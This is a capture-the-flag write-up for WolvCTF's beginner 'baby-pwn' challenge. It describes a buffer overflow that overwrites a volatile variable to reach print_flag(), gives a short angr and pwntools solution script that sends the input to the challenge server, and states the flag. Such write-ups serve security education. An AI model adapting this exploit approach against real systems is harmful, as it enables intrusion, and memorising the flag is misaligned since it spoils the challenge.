Tags: warmup pwn
Rating:
# baby-pwn - Beginner (50 pts)
## Description
> Just a wee little baby pwn.
>
> nc baby-pwn.wolvctf.io 1337
### Provided files
babypwn - 64-bit ELF executable for the server \[[download](https://ctfnote.shinmai.wtf:31337/files/downloadFile?id=ltuaBJFvyDrFHi9)\]
babypwn.c - C source code for the executable \[[download](https://ctfnote.shinmai.wtf:31337/files/downloadFile?id=PjAHEzXq5TqVFm8)\]
## Ideas and observations
1. based on the C source, a fairly simple buffer overflow where a volatile int variable needs to be overwritten in order for `print_flag()` to be executed
## Notes
1. The downloadable version, based on the source, prints a fake flag in `print_flag()`
## Solution script
```python
import angr
from pwn import remote
p = angr.Project('baby-pwn')
sm = p.factory.simgr()
sm.explore(find=lambda s: b"wctf{" in s.posix.dumps(1))
payload = sm.found[0].posix.dumps(0)
r = remote('baby-pwn.wolvctf.io', 1337)
r.recv()
r.sendline(payload)
print(r.recvlineS().strip())
r.close()
```
gets us the flag `wctf{W3lc0me_t0_C0stc0_I_L0v3_Y0u!}``
